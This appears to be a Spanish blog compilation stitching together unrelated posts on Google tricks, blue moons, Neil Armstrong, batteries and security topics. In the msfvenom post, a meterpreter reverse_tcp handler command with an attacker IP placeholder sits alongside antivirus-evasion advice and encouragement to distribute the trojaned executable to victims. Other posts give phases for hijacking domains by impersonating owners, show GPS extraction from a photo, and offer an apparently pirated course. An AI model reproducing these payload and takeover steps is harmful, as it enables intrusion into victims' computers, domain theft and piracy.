Tipeando "Do a barrel roll" o "Z or R twice", Google gira 160 grados.
Esta vez no fue un doodle lo que impactó. El misterio se apoderó con un truco de Google: "Do a barrel roll". Todos se preguntaron porqué al poner esa frase en el buscador la pantalla se vuelve loca y pega un giro completo.
Al teclear esas palabras ("Haz una vuelta de barril", en inglés) y
generar la búsqueda, la pantalla gira totalmente y deja con la boca
abierta a los internautas.
Los usuarios de todo el mundo experimentaron y su pantalla giró en 360 grados. Este invento funciona en los navegadores Firefox, Chrome y Safari, no así en Explorer de Microsoft.
La frase que gira la pantalla es usada para hacer referencia a la
necesidad de cambiar radicalmente algo que se está haciendo. Fue
popularizada a raíz del videojuego Star Fox, para Nintendo 64.
El personaje principal ocupaba la expresión cada vez que eludía
obstáculos en su nave, quedando en la memoria de los entonces jóvenes
jugadores, los mismos que hoy les hace sentido el truco de Google.
Sin embargo, el truco también está disponible al teclear "Z or R twice" en el espacio de búsqueda.
Suficiente de códigos QR en blanco y negro? Bueno, QR Hacker es la alternativa ideal para darle vida y color a un código QR. No siendo suficiente con ello, con QR Hacker incluso se puede agregar una foto o logo en el código QR, sin temor a que sea inválido o ilegible para los lectores de códigos QR.
En QR Hacker podemos fácilmente crear el código QR de un texto, URL, número de teléfono o VCard. Seleccionamos la opción deseada y luego clic en "Generate". En la sección derecha podemos personalizar el código QR y darle un color, agregar una foto de fondo (o color) y agregar un logo.
Finalmente se puede guardar el código QR como imagen o PDF.
Importante: Cada personalización va llenando la barra inferior mostrada
en la imagen. Un llenado completo de la barra significa que el código QR
está demasiado personalizado y puede volverse ilegible para los
dispositivos lectores. Es necesario que esta barra no se llene para
obtener un código QR válido o legible.
Actualmente se denomina luna azul (traducción del inglés blue moon) a la segunda luna llena ocurrida durante un mismo mes del calendario gregoriano (el usado habitualmente en occidente),
lo que sucede aproximadamente cada cuatro años. Originalmente el
término se refería al cuarto plenilunio de una estación cualquiera del
año. El fenómeno luna azul cobró popularidad cuando se produjo dos veces en el mismo año (enero y marzo) de 1999.
Los medios de comunicación reseñaron ampliamente el acontecimiento,
poco conocido hasta entonces. El mes de febrero de ese año no se produjo
ninguna luna llena.
Los meses del calendario gregoriano generalizado sobre el origen del
término, probablemente en la Europa medieval, y la difusión de su uso.
La traducción castellana tal vez sea errónea porque en inglés antiguo la palabra de la cual deriva blue podía significar tanto azul como traidor.[1]
Entre tres y siete veces en cada siglo hay dos lunas azules
en un mismo año. Debido a que el mes de febrero es el único cuya
duración es inferior al ciclo lunar, la primera siempre se produce en
enero y la segunda, en orden decreciente de probabilidad, en marzo,
abril o mayo.[2]
Se observó una el día 31 de diciembre de 2009, coincidiendo con un
eclipse parcial de luna, cuyo plenilunio previo fue el día 2 de
diciembre. Las siguientes lunas azules se producirán en agosto de
2012, julio de 2015, enero y marzo de 2018, octubre de 2020, agosto de
2023, mayo de 2026, diciembre de 2028...
Lunas Azules entre 1994 y 2094:
LUNAS AZULES
JUL 96 ENE 99 MAR 99 NOV 01 JUL 04 JUN 07 DIC 09 AGO 12 JUL 15 ENE 18
MAR 18 OCT 20 AGO 23 MAY 26 DIC 28 SET 31 JUL 34 ENE 37 MAR 37 OCT 39
AGO 42 MAY 45 ENE 48 SET 50 JUL 53 MAR 56 OCT 58 AGO 61 MAY 64 DIC 66
SET 69 MAY 72 ABR 75 OCT 77 JUL 80 MAY 83 DIC 85 SET 88 JUL 91 ENE 94
ABR 94
Actualmente el 31 de agosto del 2012 ocurrirá la luna azul.
La Analista del IEEE
Mª José Caro Bejarano analiza en un breve documento un dilema que
muchos gobiernos llevan tiempo planteando: perseguir a los hackers o
reclutarlos para sus programas de ciberseguridad. Sirva de avance algunos fragmentos del documento informativo:
"Durante el mes de junio, los
funcionarios del gobierno surcoreano habían entrevistado a 238 piratas
jóvenes altamente cualificados, todos ellos estudiantes de secundaria y
posgrado, y habían seleccionado a 60, aunque solo seis llegarán a la
fase final.
Los elegidos recibirán una beca de
casi 14.000 euros, además de la oportunidad de estudiar en el extranjero
y formar parte de la base de datos de recursos humanos de la Agencia
Nacional de Inteligencia y la Policía de Corea del Sur."
"Según Arquilla, el gobierno de EEUU,
en lugar de perseguir a los piratas informáticos de élite, debería
reclutarlos para lanzar ataques cibernéticos contra los terroristas
islamistas y otros enemigos.
Este destacado pensador militar y
asesor del gobierno, opina que EEUU se ha quedado atrás en la carrera de
cibernética y necesita establecer un "nuevo Bletchley Park" de genios
informáticos y crackeadores de código para detectar, rastrear y
desbaratar las redes enemigas."
Sin duda una interesante lectura que os recomendamos: pdf
Esta herramienta que pertenece al
framework de Metasploit, no dispone de una larga vida… allá por 2011 es
cuando explota y muestra su potencial y flexibilidad. Más bien, su
flexibilidad, ya que el potencial ya es conocido, ¿Por qué es conocido? Realmente msfvenom es la unión de msfpayload y msfencode.
Como recordatorio decir que msfpayload se encarga de generar payloads
para distintas plataformas, mientras que msfencode se encarga de
codificar dichos payloads con el objetivo de evadir la detección
mediante el uso de antivirus.
Hay que comentar que la riqueza
semántica que aporta msfvenom es digna de mencionar. Normalmente, este
tipo de aplicaciones, como son las predecesoras msfpayload y msfencode,
proporcionan parámetros del estilo -<letra>, lo cual no aporta
mucha información al auditor, atacante, usuario casero o quien quiera
que lo esté usando… Con msfvenom se dispone de parámetros semánticos, lo
cual hace que la aplicación sea realmente intuitiva y sencilla de
utilizar.
Beneficios de msfvenom
Los beneficios de msfvenom se enumeran a continuación:
Se simplifica la generación de payloads y los intentos de codificación de éstos.
Se presenta como una herramienta
estándar que ayuda a los auditores y a cualquier usuario su manejo. Es
realmente intuitiva y con fácil aprendizaje.
El rendimiento ha sido mejorado
considerablemente. La velocidad con la que msfvenom trabaja es
claramente más alta que el uso de msfpayload y msfencode por separado.
Esto es bastante lógico debido a que se evita el paso de información
entre distintos procesos, y toda acción es realizada por el mismo
proceso.
Opciones de msfvenom
Algunas de las opciones más útiles de msfvenom se enumeran a continuación:
Payload. Este parámetro especifica el payload que se utilizará.
Encoder. Este parámetro especifica el algoritmo que se utilizará para realizar la codificación.
Format. Especifica el formato, normalmente EXE
Bad-chars. Este parámetro indica un
listado de bytes que no se deben generar en el proceso de obtención del
payload. Por ejemplo, si se quieren evitar los bytes nulos ‘\x00′ se
añaden en la lista de este parámetro.
Iterations. Indica el número de iteraciones que se ejecutará el algoritmo del encoder.
Template. Indica la plantilla de ejecutable que se utilizará.
Keep. Especifica que el payload se
ejecutará en un thread y no en el main del ejecutable. Con esta opción
se implementa la técnica de plantilla personalizada sigilosa.
Ejemplo o prueba de concepto: msfvenom y el ejecutable meterpreter
En este breve ejemplo se utilizará
msfvenom para crear un ejecutable para sistemas windows con el que,
cuando la víctima ejecute el archivo devolverá el control de la máquina
al atacante. En primer lugar el atacante utiliza msfcli para lanzar el
manejador, configurado para recibir sesiones inversas de meterpreter. La
orden sería la siguiente msfcli exploit/multi/handler lhost=<ip atacante> lport=<puerto atacante> payload=windows/meterpreter/reverse_tcp.
Ahora, creamos el ejecutable de la siguiente manera:
Una vez que el archivo es creado se debe distribuir, aquí ya… ya sabéis: “El límite es tu imaginación“.
Ahora, una vez que la víctima ejecute el archivo recibiremos la sesión
inversa, teniendo una sesión de meterpreter, con todo lo que ello
conlleva! que no es poco…
Análisis de virus total
Por último, hablaremos de un análisis
sobre el ejecutable que hemos creado. Hay que tener en cuenta que en la
prueba de concepto hemos utilizado una plantilla, que es el ejecutable
de RootkitRevealer, para inyectarle un payload. ¿Cuantos antivirus
salvaremos? En la siguiente imagen se puede visualizar los resultados.
Metasploit da mucho juego, y el
framework aporta una riqueza y flexibilidad a los pentesters
inigualable. En Flu Project creemos que a finales de año y principios
del proximo será el año Metasploit! Esperemos que así sea…
Para la ya pasada Defcon20, mi amigo Luis Delgado (@ldelgadoj) me pidió que le ayudara a enviar y dar una charla allí, ya que había descubierto varios 0days en OVH y quería presentarlos. Nos reunimos y hablamos de ello, y luego estuvimos trabajando un par de días más en Las Vegas para dejar la charla que dimos en SkyTalks.
Esta sección de conferencias es una sección privada en la que se puede
presentar casi cualquier cosa, porque no se graban. Hoy en día, ya
solucionados los bugs en OVH, vamos a contaros la sesión que construimos.
Pull the Plug: Bureaucratic Denial Of Service
El servidor DNS de una compañía quizá es uno de los más
importantes, si no el que más grado de impacto tiene en el
funcionamiento de una empresa. Esto es debido a que la mayoría de los
servicios de negocio, comenzando desde la visibilidad web de la
organización, están enlazados a él. Servicios de correo electrónico,
páginas o web, e incluso la publicación de los RSS de los blogs dependen de un punto accesible a través del servicios DNS. Si una empresa se queda sin DNS, entonces todo se pierde.
Figura 1: Secuestro de dominio a TheRegister.co.uk
Los ataques DNS han sido siempre los que más han preocupado a la infraestructura de Internet, por lo que ataques como el Dan Kaminsky, o los fallos explotables en DNS o registradores de Internet siempre tienen un impacto especial. Dentro de estos "ataques", hay que destacar los ataques judiciales que se realizan mediante el sistema legal. Cada Top Level Domain
tiene un sometimiento legal a las leyes de un determinado país,
llegando a suceder que si un país quiere desconectar a una organización
de Internet, puede hacerlo a través del nombre de dominio.
Figura 2: Supresión del dominio Rojadirecta.com por el gobierno americano
Estos casos fueron de especial relevancia, a nivel mundial con Wikileaks.org, y en el caso de España tuvo
mucha relevancia Rojadirecta.com, que al ser un dominio .com está
sometido a la legislación americana. Como un intento de evitar la
censura de los canales de comunicación RSS fue por lo que se creo el sistema DUST, de publicación de feeds RSS mediante redes P2P y uso de PGP.
Figura 3: Anuncio de supresión de Wikileaks,org por Twitter y DUST
Registradores de dominios internacionales
Dejando a los gobiernos y los TLDs atrás, hay una
organización en medio, que casi todas las compañías tienen, que son los
registradores, que pueden ser nacionales, o simples empresas
intermediarias que ofrecen servicios de Internet, como el registro DNS, el hosting web, etcétera. Empresas de este tipo son 1and1, GoDaddy, OVH,
etcétera. La seguridad de los sistemas que implementen dichas compañías
impacta directamente en la existencia o no de sus clientes en Internet.
Es por ello que deben tener sistemas informáticos y procedimientos de
gestión seguros a la hora de manejar los nombres de dominio de sus
clientes.
Figura 4: OVH es una gran empresa en este campo
El objetivo de este artículo es mostrar que tanto los fallos en las
aplicaciones web que permiten a los usuarios gestionar sus servicios,
como los fallos en la lógica de las operaciones, pueden llevar a que un
cliente pierda su dominio y sea desconectado de Internet.
Ataques a los nombres de dominios
Dentro de los ataques más importantes que se pueden hacer se encontraría, como no, el secuestro del dominio, y el "pull the plug" o borrado del dominio de Internet, lo que supondría una Denegación de Servicio bastante engorrosa de solucionar en un corto espacio de tiempo. Las fases para realizar estos ataques serían las siguientes:
Fase 1: Recogida de información: El objetivo es aprovechar
cualquier data leak o bug en el sistema informático de la compañía para
poder sacar datos del dominio víctima. Por supuesto, la segunda fase
sería aprovechar OSINT (Open Source Intelligence), es decir, las fuentes de información abiertas, como servicios Whois, metadatos, buscadores de Internet o redes sociales.
Fase 2: Petición de borrado del dominio: Una vez conseguida toda
la información necesaria, intentar suplantar al dueño legítimo del
mismo. Esto deberá realizarse de dos formas, una de ellas informática
mediante la creación de una petición falsa de borrada del dominio con
suplantación del dueño, y una segunda, en la que se salten los sistemas
de validación del registrador, en la fase 3.
Fase 3: Cumplimentación del proceso: En esta fase hay que
conseguir cumplir con todos los requerimientos del proceso, y evadir
cualquier control que tenga implementada la compañía, para identificar
de forma robusta al dueño del dominio.
Hoy, en uno de esos
intentos por escribir algo que no solo tenga que ver con fallos de
seguridad informática me decidí a escribir un post básico sobre las
vulnerabilidades más comunes en aplicaciones web y como sanitizarlas.
Segunda parte de esta entrega, esta vez poniendo solución a fallos relacionados con la inclusión de archivos ejecutables
Veamos el típico ejemplo de inclusión de archivos de forma dinámica convirtiendose en métodos inseguros.
En ochenta mil sitios van a decir que este código es vulnerable y hay que sanitizar la variable $file, yo digo que no. Lo que no hay es que realizar includes dinámicos directamente para no comprometer el servidor.
Sí, se podría sanitizar pero, ¿hasta que punto lo convertiríamos en un LFI? ¿Realmente es posible?
Claro que es posible filtrar los datos de entrada, pero es que no es
necesario porque el mismo código se podría estructurar de otra forma más
segura. Veamos:
Así y con un poco de código extra se pueden guardar los logs de los
"hackers" que lo intentaron por esa vía y bloquear sus ips o hacer lo
que se crea necesario.
2. - Inyecciones tipo SSI a partir de XSS (Server Side Includes).
Lo más típico, descubrir un fallo tipo XSS en un servidor Apache y
probar si SSI está activado. Es sorprendente la cantidad de servidores
que lo tienen activado y no lo usan, simplemente porque no saben que
está ahí.
Llegados a este punto es fácil saber que de no existir el XSS (All the input is evil - I de III) esto nunca llegaría a funcionar.
Así que para que repetir lo que ya sabemos, cuidado con las inyecciones
tipo Cross Site Scripting porque son más de lo que parecen (nunca
dijimos lo contrario).
El primer hombre en pisar la luna, el estadounidense Neil Armstrong,
murió el sábado a los 82 años en Ohio (EEUU), días después de superar
una operación de corazón, según informan las cadenas de televisión
norteamericanas NBC y ABC.
Comenta esta lamentable noticia en nuestros Foros. La agencia Efe informó que Armstrong,
que en julio de 1969 hizo historia en la misión del Apolo 11 junto a
los astronautas Buzz Aldrin y Michael Collins, se sometió a principios
de mes a una operación, aunque por el momento se desconoce la causa
inmediata de su fallecimiento. Armstrong comandó la nave espacial Apollo 11 que aterrizó
Recordándole como un "reacio héroe estadounidense",
su familia explicó en un comunicado que "sirvió a su nación con
orgullo, como piloto de guerra de la Marina, piloto de pruebas y
astronauta". Armstrong, quien hizo historia en la misión del Apolo 11 junto a los astronautas Buzz Aldrin y Michael Collins, se sometió a principios de mes a una operación por problemas cardiovasculares, cuyas "complicaciones" llevaron a su muerte, según el comunicado. (Lea también: La historia detrás de Neil Armstrong). Su familia se mostró "devastada" al informar de la muerte del hombre que hizo famosa la frase "un pequeño paso para el hombre, un gran paso para la humanidad", y que era además "un cariñoso marido y padre". "Era un héroe estadounidense a
regañadientes porque siempre creyó que sólo estaba haciendo su trabajo",
señaló el comunicado citado por la cadena CNN, en el que la familia
subraya su pasión por la aviación y la exploración espacial. Antes de hacer historia al pisar la luna hace 43 años, Armstrong fue un ingeniero y piloto de pruebas de la Fuerza Aérea estadounidense, y después pasó al Comité Nacional de Asesores para la Aeronáutica, la agencia predecesora de la NASA. (Lea: Los primeros pasos lunares de Armstrong, un revés para la URSS).
La
misión del Apolo 11 fue su última incursión en el espacio, y su único
papel de relevancia pública desde entonces fue el de vicepresidente de
la investigación del desastre del transbordador Challenger, en 1982. Su última comparecencia pública fue en noviembre de 2011
cuando recibió la medalla de Oro del Congreso de Estados Unidos junto a
sus compañeros de la misión a la luna, Aldrin y Collins.
'Era un héroe': Obama
El
presidente de Estados Unidos, Barack Obama, afirmó estar "profundamente
triste" al tiempo que alabó al astronauta Neil Armstrong, primer hombre
en pisar la Luna el 20 de julio de 1969 y fallecido este sábado a los
82 años, un gran héroe nacional que inspiró a toda una generación.
"Neil
era uno de los grandes héroes estadounidenses, no sólo de su tiempo,
sino de todos los tiempos. Cuando él y su compañero de misión despegaron
a bordo del Apollo 11 en 1969 llevaron las aspiraciones de una nación
entera", afirmó el presidente en un comunicado.
En esta entrada, mostraré cómo extraer los Metadatos de las Fotografías para saber el lugar exacto de ubicación donde se tomo la Fotografía.
Hay que tener en cuenta que no todas las Fotografías tienen datos GPS.
La mayoría de las fotos que existen con estos datos, son tomadas desde
teléfonos inteligentes y/o cámaras de ultima generación.
Sin embargo, muchas personas que cuentan con estos teléfonos, no tienen conocimiento sobre la opción GPS, por lo que simplemente no saben que esta encendido al momento de tomar una Fotografía.
También resaltar que este método es utilizado para resolver muchos "crímenes" porque realizando un Análisis Forense de una Fotografía, se puede obtener los datos REALES y EXACTOS
del momento, fecha, hora, ubicación, nombre de la cámara, fecha
de edición si la imagen ha sido editada y todas las demás opciones
puestas en ella, llegando así a obtener un resultado real.
¿Qué son los metadatos?
Metadatos en pocas palabras es decir, los datos acerca de los datos, por
ejemplo cuando se toma una fotografía, se obtiene una gran cantidad de
datos, como qué tipo de cámara tome la foto, la hora y fecha en que fue
tomada etc...
Ahora bien, para realizar este método, usaremos la herramienta EXIFTOOL que esta disponible tanto para Linux como para Windows.
En BackTrack podemos encontrarla en la siguiente dirección:
Descomprimen el archivo Exiftool en una carpeta preferida, abren la terminal y vamos a la carpeta exiftool.
INSTALACIÓN:
perl Makefile.PL
make
make test
make install
./exiftool
Teniendo todo listo, creamos una carpeta donde ira la imagen que
deseamos extraer los metadatos, en este caso yo he creado una carpeta en
root con el nombre images, asegurese de conocer bien la ruta.
La imagen que voy a utilizar se llama fotografia.jpg la cual esta en la carpeta images.
La ruta seria: ~/images/fotografia.jpg
Ahora, en la terminal de exiftool tecleamos el siguiente comando:
./exiftool -a ~/images/fotografia.jpg
La cual nos arroja los siguientes datos:
Se puede observar muchos datos, como la fecha y hora que se tomo la
imagen y todo lo demas que mencione lineas arriba, ademas de que la foto
fue tomada desde un SAMSUNG.
En este caso, queremos saber la ubicacion de donde fue tomada la
fotografia, por lo que copiaremos los datos GPS, la cual son los
siguientes:
GPS Latitude: 42 deg 24' 54.91" N
GPS Longitude: 83 deg 25' 21.36" W
GPS Position : 42 deg 24' 54.91" N, 83 deg 25' 21.36" W
Certified Ethical Hacker v7proporciona un exhaustivo red de programas de Hacking Ético y Seguridad para cumplir con los estándares de los profesionales de seguridad altamente calificados.
Cientos de SMEs y autores han contribuido al contenido que se presenta en el material pedagógico Certified Ethical Hacker v7.
Las últimas herramientas y Exploits descubiertos de la comunidad Underground se ofrecen en este paquete
Estos DVD-ROM es solamente para investigación y propósitos educativos. El objetivo principal de estos DVD-ROM
es proporcionar al usuario contenido para Investigación en Educación o
el ser relevante para la seguridad de red y los distintos métodos de
protección y sus defectos intrínsecos mediante la demostración de
métodos de exploits y técnicas.
Esta información debe ser utilizada únicamente con fines docentes y de investigación.
El uso o la aplicación de algunos de los programas o contenidos en este DVD puede violar la Ley Federal.
Por esta razón se instruye a no utilizar cualquiera de los programas o
contenidos aquí dentro que pueda violar cualquier ley o atentan contra
la protección de copyright de otros.
DESCRIPCIÓN:
EC-Council Certified Ethical Hacker v7 English | ISO + PDF + VIDEOS | 19 Modules | 16.25 GB
El precio total sobre esta documentación es de $1,295.00 por
lo tanto la descarga gratis esta muy escasa en Internet, ya que
la mayoría de descargas se pueden realizar mediante un pago o una cuenta
premium con dinero, pero en este caso se las estoy dejando totalmente FREE asi que por favor agradecer no cuesta nada :)
"Sus
sistemas tenían instalados los últimos parches, su equipo de seguridad
vigilando y los pentesters (aficionados) acababan de entregar su informe
de "cumplimiento". Ellos pensaban que su dominio de Windows era seguro.
Ellos pensaron mal."
Zack Fasel presentó en la DefCon 20 un nuevo toolset escrito en Ruby y bautizado como ZackAttack
con nuevos métodos para obtener solicitudes de autenticación integradas
de Windows y realizar re-envíos NTLM tanto interna como externamente.
¿El objetivo? Empezar como un don nadie y obtener el administrador de
dominio (o datos sensibles/accesos) en 60 segundos o menos en un
entorno Windows con todos los parches y típicamente securizado. ¿El
resultado? Zack demuestra la posibilidad de ganar acceso *externamente* a
una cuenta de dominio Exchange simplemente mediante el envío de un
correo electrónico con consejos para evitar estos ataques. Con
tan sólo un clic en un enlace, una vista de un correo electrónico o una
mala petición web, este nuevo conjunto de herramientas roba la
identidad de los usuarios objetivo y se aprovecha de su acceso. Llama a
tus administradores de dominio, oculta tus road warriors y avisa a tus
usuarios internos. Zack va a cambiar la forma de pensar acerca de la
seguridad y las relaciones de confianza del Directorio Activo de
Windows, que te conduciran a promover la fortificación de tus sistemas y
ayudarte a dormir mejor por la noche.
A
todos nos ha pasado que cuando salimos de casa con el tiempo justo para
llegar a alguna reunión, trabajo o a nuestro centro de estudios,
queremos conocer el estadodel tránsito
para evitar recorrer las avenidas más congestionadas por autos y demás
vehículos de transporte público, y optar por aquellas en las que haya
mayor fluidez.
Y si vives en Lima, de hecho que
esa información te sería muy útil. Pues bien, si estás a punto de salir
de casa para ir a tu trabajo, o en todo caso ya saliste de casa, te
vendría bien echar un vistazo a GoogleMaps porque, a partir de ahora, la plataforma de mapas que brinda la compañía de la gran G muestra la informacióndeltránsitoentiemporeal en nuestro país, Perú.
El sistema es muy sencillo. Solo hace falta ir al sitio web de GoogleMaps, ubicarte en la región del mapa de la cual quieres conocer el estadodel tránsito, y luego seleccionar la pestaña ‘Tránsito‘, que está en la parte superior derecha del mapa. Una vez hecho eso, verás el estado de congestionamiento de las avenidas de acuerdo con líneas de colores trazadas en el mapa. Por ejemplo, si ves una línea de color verde, quiere decir que el tránsito es rápido, mientras que todo lo contrario si la línea dibujada sobre el mapa es de color rojo.
¿Qué les parece? Personalmente, pienso que es una gran alternativa (aparte de sintonizar la radio) para enterarnos del tránsito en Perú y así salir de casa preparados para enfrentarnos a lo que pueda suceder en el camino, sobre en todo en una ciudad como Lima, que cada vez más parece más congestionada.
Pero además de Perú, la informaciónen tiempo realdel tránsito de GoogleMaps ha sido añadida recientemente a otros países, como México, Bielorrusia, Estonia, Letonia, Rumania y Sudáfrica.
Un mensaje del fundador de Wikipedia, Jimmy Wales
Google puede tener cerca de un millón de servidores. Yahoo tiene alrededor de 12.000 empleados. Nosotros tenemos 679 servidores y un equipo de 138 personas.
Wikipedia es el quinto sitio web en la red y es usado por 492 millones de personas diferentes cada mes, con miles de millones de vistas de páginas.
Comerciar es bueno, la publicidad no es algo malo, pero no tiene lugar aquí. No en Wikipedia.
Wikipedia es algo especial. Es como una biblioteca o un parque público. Es como un templo para el pensamiento. Un lugar al que todos podemos ir a pensar, a aprender, a compartir nuestros conocimientos con otros.
Cuando fundé Wikipedia, pude haberla creado como una compañía lucrativa, con anuncios publicitarios, pero decidí hacer algo diferente. A lo largo de los años, hemos trabajado bastante para no gastar de más. Cumplimos nuestra misión, sin desperdiciar nuestros limitados recursos.
Si todas las personas que leen este mensaje donaran S/.15, sólo tendríamos que recaudar fondos un día al año. Pero no todos pueden donar o están en disposición de hacerlo, y está bien que sea así. Cada año el número de personas que deciden donar es justo el necesario.
Este año, por favor considera hacer una donación de S/.15, S/.30, S/.60 o la cantidad que puedas para proteger y mantener Wikipedia.
Gracias,
Jimmy Wales
Fundador de Wikipedia
La Ley de Moore nos malacostumbró a esperar que la capacidad de un
microprocesador se duplique cada 18 meses e incluso hemos visto que se
aplica de forma similar a la capacidad de almacenamiento e incluso al
ancho de banda. Cada vez tenemos productos electrónicos más rápidos, más
pequeños y con más memoria. Sin
embargo las baterías que utilizan estos productos están basadas en una
tecnología con más de 20 años de antigüedad y sus mejoras han avanzado a
un ritmo glacial. Pero hay signos esperanzadores que eso está pronto a
cambiar.
Para empezar, el problema de las baterías tiene más de una arista.
Primero tenemos el problema de la capacidad: Queremos baterías que sean
capaces de almacenar más energía en el mismo espacio y ojalá en tamaños
cada vez más pequeños, en otras palabras, queremos más vatios-hora por
kilogramo (Wh/kg). También queremos que lleguen a su carga máxima en el
menor tiempo posible. Luego queremos que las baterías sean cada vez más
baratas para que, por ejemplo, los autos eléctricos o híbridos puedan
costar lo mismo o menos que los autos a gasolina. Adicionalmente todas
las baterías tienen una vida útil limitada ya que con cada ciclo de
carga/descarga van perdiendo
capacidad. Y finalmente tenemos los problemas térmicos donde las
baterías se calientan con el uso, hasta incluso generar problemas de
seguridad con baterías entrando en combustión. Lo que necesitamos hoy
son baterías baratas, seguras,
que se carguen a su capacidad máxima en pocos minutos, que aguanten
miles de ciclos de carga y con una densidad que permita acumular mucha
energía en el menor espacio posible.
La baterías de hoy
Las baterías más populares y avanzadas que encontramos hoy en nuestros
artefactos son las baterías de Litio-Ion Polímero — algo que tiene muy
contento a Argentina, Bolivia y
Chile, ya que estos 3 países concentran en sus salares el 90% de las
reservas mundiales de litio. Estas las podemos encontrar hoy en nuestros
dispositivos electrónicos, autos eléctricos y hasta en el sistema de
suministro eléctrico. Sin embargo las baterías de Li-Ion se empezaron a
comercializar en 1991, por lo que llevamos usando prácticamente la misma
tecnología hace más de dos décadas y sobre la cual todos podemos
concordar que necesita una actualización de forma urgente.
Estas baterías que utilizamos hoy tienen una vida útil de 400 a 1200
ciclos de carga, y una capacidad de 100 a 250 Wh/kg. Finalmente tienen
el problema de la velocidad de carga donde, por ejemplo, para un iPod en
las primeras 2 horas cargas el 80% de capacidad y luego se demora 2
horas más en cargar el 20% restante.
Un problema acentuado especialmente cuando se aplica en automóviles
eléctricos. El año pasado estuve manejando durante un par de semanas un
Mitsubishi iMiEV y aunque la ruta que recorro diariamente no son más de
15 Kms, debía estar recargando su batería de Li-Ion cada 3 días. En el
punto de recarga podía recargar el 50% de la capacidad en 15 minutos y
luego debía pasar a un ciclo de carga mucho más lento que duraba hasta 8
horas ya que podía “degradar considerablemente” la capacidad de la
batería, acortando rápidamente su vida útil, si continuaba con la carga
rápida. Difícil va a ser convencer al mundo de cambiarse a autos
eléctricos mientras las baterías carguen tan lento, sean tan caras y más encima deban ser reemplazadas a los pocos años.
Las baterías de mañana
Las desventajas de la tecnología actual están claras, así que empecemos a
ver que esperanza hay en el futuro. Hay cuatro tecnologías que se ven
promisorias: Litio-Ion Silicio, Litio-Ion 3D, Litio-aire y Zinc-aire.
Litio-Ion Silicio
Varios investigadores incluyendo el equipo del Dr. Yi Cui en la Universidad
de Stanford han anunciado avances en reemplazar el ánodo en una batería
de Li-Ion por uno cubierto en nanohilos de silicio en vez del grafito
(carbono) utilizado hoy. El resultado son baterías de Li-Ion con una
capacidad específica 10 veces superior a las baterías actuales.
Tradicionalmente el problema de los ánodos de silicio era que durante la
carga estos podían aumentar hasta 4 veces su tamaño, para luego volver a
su dimensión original durante la descarga.
Esto significa que después de pocos ciclos de carga el ánodo quedaba
destruido resultando en una vida útil muy corta para la batería. Sin
embargo los últimos avances en nanotubos de silicio de doble capa dan
esperanza que finalmente este obstáculo haya sido superado con
demostraciones de laboratorio sobre los 6.000 ciclos de carga, superando
considerablemente la vida útil de las baterías actuales. Esto nos daría
baterías con una capacidad 10 veces superior utilizando el mismo
espacio, y una vida útil 6 a 12 veces superior a las actuales.
Litio-Ion 3D
La compañía Prieto Battery y su fundadora la Dra. Amy Prieto (sin
relación), están trabajando en otra forma de reemplazar el ánodo de
grafito en una batería Li-Ion con algo más eficiente. En su caso lo
están reemplazado con ánodos de nanohilo de cobre. El resultado según
ellos son baterías que funcionan en “3 dimensiones”, permitiendo un
movimiento de los iones mucho más rápido, con uno de los beneficios
siendo poder cargar al 100% la batería de un iPhone en 5 minutos con una
fuente de electricidad de 240 volts. A esto hay que sumarle el
beneficio de baterías más seguras y una vida útil teórica de más de 5.000 ciclos de carga.
Litio-Aire
Tanto IBM como PolyPlus, entre otros, están investigando las baterías de
Litio-aire dónde utilizan el oxígeno atmosférico para modificar la
estructura tradicional del cátodo. Esto resulta en baterías con una
capacidad específica 10 veces superior a las actuales (lo que vendría
siendo similar a la densidad energética de la gasolina en un auto),
considerablemente más baratas y adicionalmente con un peso muy reducido.
Apuntando principalmente al sector automotriz, prometen una autonomía
sobre los 800 Km con una configuración similar a los autos eléctricos
actuales. Sin embargo todavía queda el desafío de aumentar la vida útil
de la batería y resolver los problemas de los contaminantes y humedad
presentes en el oxigeno atmosférico, para lo cual ya existen varias
soluciones teóricas con las cuales están experimentando.
Zinc-Aire
Similar a las baterías de Litio-aire, las baterías de Zinc-aire
recargables han sido largamente sólo una promesa. Pero finalmente
empresas como EOS Energy Storage en EEUU y ReVolt en Suiza prometen
haber superado, al menos en el laboratorio, sus principales deficiencias
incluyendo recargarlas de forma eficiente. La promesa son baterías
mucho más baratas, seguras y con una vida útil superior a los 10.000
ciclos de carga (al menos en el caso de EOS). Su intención es resolver
problemas de almacenamiento de energía en el sistema de suministro
eléctrico, permitiendo capturar la energía intermitente que se obtiene
de turbinas eólicas y paneles solares,
eliminando el principal problema que declaran los detractores de estas
energías renovables. Aunque ReVolt promete haber descubierto la forma de
utilizar estas baterías también en automóviles y dispositivos
electrónicos.
Sin importar cual de estas cuatro tecnologías salga finalmente del
laboratorio a un uso real, los avances se ven promisorios. Los expertos
concuerdan que el último desafío por superar es la manufactura a escala
masiva de estas tecnologías. Al menos gobiernos e inversionistas
privados están aportando grandes montos a que finalmente demos un gran
salto en la evolución de las baterías. Lo mejor de todo es que varias de
estas empresas proyectan tener estas soluciones en el mercado en un
plazo que varía entre 2013 y 2015. A cruzar los dedos.